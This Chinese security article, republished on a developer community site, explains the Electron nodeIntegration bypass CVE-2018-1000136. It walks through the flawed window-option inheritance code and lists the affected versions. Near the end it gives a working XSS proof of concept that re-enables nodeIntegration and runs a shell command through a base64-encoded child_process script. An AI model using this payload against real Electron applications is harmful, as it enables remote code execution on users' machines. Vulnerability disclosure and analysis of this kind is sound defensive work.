CVE-2018-1000136:Electron nodeIntegration绕过漏洞-阿里云开发者社区

开发者社区> 开发与运维> 正文
登录阅读全文

CVE-2018-1000136:Electron nodeIntegration绕过漏洞

简介:

1周前,研究人员发现一个影响Electron所有版本的漏洞,利用该漏洞可以开启nodeIntegration,这可能会造成远程代码执行。Electron是一个使用JavaScript,HTML和CSS等Web技术创建原生程序的框架,它负责比较难搞的部分,而用户只需把精力放在应用的核心上即可。Slack、Discord、Signal、Atom、Visual Studio Code、Github桌面版等很多的应用都是用了Electron框架。

Electron是web应用,也就是说如果没有正确对用户输入进行处理的话就可能会受到XSS脚本攻击。默认的Electron应用不仅可以包含对自己API的访问,还包含对所有Node.js植入模块的访问。这会让XSS攻击的危险变大,因为攻击者的payload可以做很多的坏事,比如在客户端执行系统命令等。Atom前不久就被曝类似的XSS漏洞。用户可以将nodeIntegration: false传入应用webPreferences中,来移除对Node.js的访问。

还有一个webview的tag特征可以将内容嵌入到Electron应用中,并以独立的进程运行。当使用webview tag时,你可以传递一些属性值,其中就包括nodeIntegration。WebView容器默认是不开启nodeIntegration的。文档描述了如果webviewTag选项没有在webPreferences中明确说明,就会继承nodeIntegration的设定值的权限。

默认情况下,Electron会使用传统的window.open()函数来创建一个BrowserWindow的新实例。子窗口默认会继承父窗口的所有选项。传统的window.open()函数允许用户通过在featuresargument中传递一些值来修改继承的选项的值:

if (!usesNativeWindowOpen) {
 // Make the browser window or guest view emit "new-window" event.
 window.open = function (url, frameName, features) {
 if (url != null && url !== '') {
 url = resolveURL(url)
 }
 const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features))
 if (guestId != null) {
 return getOrCreateProxy(ipcRenderer, guestId)
 } else {
 return null
 }
 }
 if (openerId != null) {
 window.opener = getOrCreateProxy(ipcRenderer, openerId)
 }
}

当Electron的window.open函数被调用,就会触发一个ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN事件。该事件处理器会将这些特征进行语法分析,并把这些特征加入到新创建的窗口的选项中,然后触发ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN事件。为了防止子窗口做坏事,guest-window-manager.js含有一个webPreferences选项的硬编码的列表和限定值:

// Security options that child windows will always inherit from parent windows
 const inheritedWebPreferences = new Map([
 ['contextIsolation', true],
 ['javascript', false],
 ['nativeWindowOpen', true],
 ['nodeIntegration', false],
 ['sandbox', true],
 ['webviewTag', false]
 ]);

ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN事件处理器调用mergeBrowserWindowOptions函数来确保父窗口webPreferences的限制属性应用到子窗口:

 const mergeBrowserWindowOptions = function (embedder, options) {
 [...]
 // Inherit certain option values from parent window
 for (const [name, value] of inheritedWebPreferences) {
 if (embedder.getWebPreferences()[name] === value) {
 options.webPreferences[name] = value
 }
 }
 // Sets correct openerId here to give correct options to 'new-window' event handler
 options.webPreferences.openerId = embedder.id
 return options
 }

这就是该漏洞的核心。mergeBrowserWindowOptions函数并不会考虑到这些限制属性的默认值是否定义过。或者说,如果webviewTag: false没有在应用的webPreferences中明确定义,当mergeBrowserWindowOptions函数检查webview Tag时,就会返回undefined,让上面的if判断返回错误,就不会应用父窗口的webviewTag preference。这会让window.open以额外特征的方式传递webview Tag选项,重新开启nodeIntegration,并最终导致潜在的远程代码执行。

POC

下面的POC说明了XSS payload如何在运行时重新开启nodeIntegration,并执行系统命令:

<script>
 var x = window.open('data://yoloswag','','webviewTag=yes,show=no');
 x.eval(
 "var webview = new WebView;"+
 "webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+
 "webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+
 "document.body.appendChild(webview)"
 );
 </script>

poc执行的条件为:

· Electron应用的nodeIntegration是关闭的;

· 含有没有适当处理用户输入的XSS漏洞或其他依赖该应用的漏洞;

· Electron 版本< 1.7.13, < 1.8.4, 或 < 2.0.0-beta.3;

· 没有在webPreferences中声明webviewTag: false;

· 或没有在webPreferences中开启nativeWindowOption选项;

· 或没有用选项tag来拦截新窗口时间或覆写 event.newGuest。

如果以上条件满足,那么POC就可以在有漏洞的Electron版本上远程代码执行。


原文发布时间为:2018-05-18

本文来自云栖社区合作伙伴“嘶吼网”,了解相关信息可以关注“嘶吼网”。

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:
开发与运维
使用钉钉扫一扫加入圈子
+ 订阅

集结各类场景实战经验,助你开发运维畅行无忧

其他文章